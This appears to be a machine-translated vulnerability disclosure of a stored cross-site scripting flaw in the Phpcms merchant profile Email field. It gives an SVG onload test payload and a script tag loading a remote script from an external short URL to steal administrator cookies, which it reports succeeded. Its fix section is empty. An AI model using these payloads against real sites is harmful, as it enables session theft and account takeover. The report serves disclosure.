Detailed Description:
demo+ Local Demos
exist XSS the place in the business center of the merchant information of my profile Email There (this is a good word to go around.) ), the filter is not strictly random characters, I wrote directly in the Email "/><svg onload=alert (/1/) > You can see it's right.
Then click Submit to see that the operation was successful
Then come to our enterprise homepage to see the successful pop-up window
??
Then look at the source code, you can see the storage type
originally want to go backstage to view, but helpless Demo do not provide background demonstrations, had to build a local look, the local set up after the back to the background to view is not directly playing backstage, but the administrator audit members of the time will go to the member of the Enterprise view, this time can see the successful pop -up window
??
then continue to construct: "/><script src=http://t.cn/rz4oi2b></script> , after submitting to see if can play Cookies
can see that has been successfully hit cookie~
Proof of vulnerability:
Fix solution:
Phpcms A storage-type XSS (demo+ local demo)